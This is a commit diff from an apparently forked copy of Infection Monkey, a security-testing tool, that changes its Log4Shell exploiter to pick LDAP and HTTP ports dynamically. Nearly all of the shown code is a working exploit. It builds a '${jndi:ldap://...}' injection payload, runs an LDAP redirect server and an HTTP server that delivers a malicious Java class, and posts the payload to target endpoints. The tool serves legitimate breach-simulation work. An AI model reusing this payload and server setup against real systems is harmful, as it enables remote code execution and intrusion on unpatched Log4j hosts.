p15670423
/
monkey
1
0
Fork 5
Code Issues Pull Requests 3 Projects Releases Wiki Activity

Agent: change ldap and http ports to be chosen dynamically in log4shell

This commit is contained in:
vakarisz 2022-01-05 12:04:21 +02:00
parent 0659fddac6
commit 8a120110f5
2 changed files with 14 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
monkey/infection_monkey/exploit/log4shell.py
View File

@ -19,6 +19,7 @@ from infection_monkey.model import (
MONKEY_ARG,
VictimHost,
)
from infection_monkey.network.info import get_free_tcp_port
from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.utils.commands import build_monkey_commandline
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
@ -30,13 +31,13 @@ class Log4ShellExploiter(WebRCE):
_TARGET_OS_TYPE = ["linux", "windows"]
EXPLOIT_TYPE = ExploitType.VULNERABILITY
_EXPLOITED_SERVICE = "Log4j"
LDAP_PORT = 8080
CLASS_HTTP_SERVER_PORT = 1337
DOWNLOAD_TIMEOUT = 15
def __init__(self, host: VictimHost):
super().__init__(host)
self._client = None
self.ldap_port = get_free_tcp_port()
self.class_http_server_port = get_free_tcp_port()
def exploit_host(self):
@ -53,15 +54,13 @@ class Log4ShellExploiter(WebRCE):
java_class = self.build_java_class(command)
class_http_server_ip = get_interface_to_target(self.host.ip_addr)
java_class_http_thread = Log4ShellExploiter.get_java_class_server_thread(
class_http_server_ip, java_class
)
java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class)
java_class_http_thread.start()
ldap = LDAPExploitServer(
ldap_server_port=Log4ShellExploiter.LDAP_PORT,
ldap_server_port=self.ldap_port,
http_server_ip=class_http_server_ip,
http_server_port=self.CLASS_HTTP_SERVER_PORT,
http_server_port=self.class_http_server_port,
storage_dir=get_monkey_dir_path(),
)
ldap_thread = ldap.get_run_thread()
@ -86,7 +85,7 @@ class Log4ShellExploiter(WebRCE):
def build_ldap_payload(self):
interface_ip = get_interface_to_target(self.host.ip_addr)
return f"${{jndi:ldap://{interface_ip}:{Log4ShellExploiter.LDAP_PORT}/dn=Exploit}}"
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
def build_command(self, path, http_path):
@ -133,20 +132,15 @@ class Log4ShellExploiter(WebRCE):
self.wfile.write(self.java_class)
Log4ShellExploiter.HTTPHandler.class_downloaded = True
@staticmethod
def _run_class_http_server(ip):
server = http.server.HTTPServer(
(ip, Log4ShellExploiter.CLASS_HTTP_SERVER_PORT), Log4ShellExploiter.HTTPHandler
)
def _run_class_http_server(self, ip):
server = http.server.HTTPServer((ip, self.class_http_server_port), Log4ShellExploiter.HTTPHandler)
while (
not Log4ShellExploiter.HTTPHandler.class_downloaded
and not Log4ShellExploiter.HTTPHandler.stop
):
server.handle_request()
@staticmethod
def get_java_class_server_thread(ip: str, java_class: bytes):
def get_java_class_server_thread(self, ip: str, java_class: bytes):
Log4ShellExploiter.HTTPHandler.java_class = java_class
return Thread(target=Log4ShellExploiter._run_class_http_server, args=[ip])
return Thread(target=self._run_class_http_server, args=[ip])

6
monkey/infection_monkey/exploit/log4shell_utils/requests/poc_docker.py
View File

@ -13,9 +13,9 @@ def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
payload = {"uname": payload, "password": "m0nk3y"}
for url in urls:
try:
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
except requests.ReadTimeout:
logger.debug("Couldn't send request to the vulnerable machine")
resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}")
def build_urls(open_ports: List[int], host: VictimHost) -> List[str]: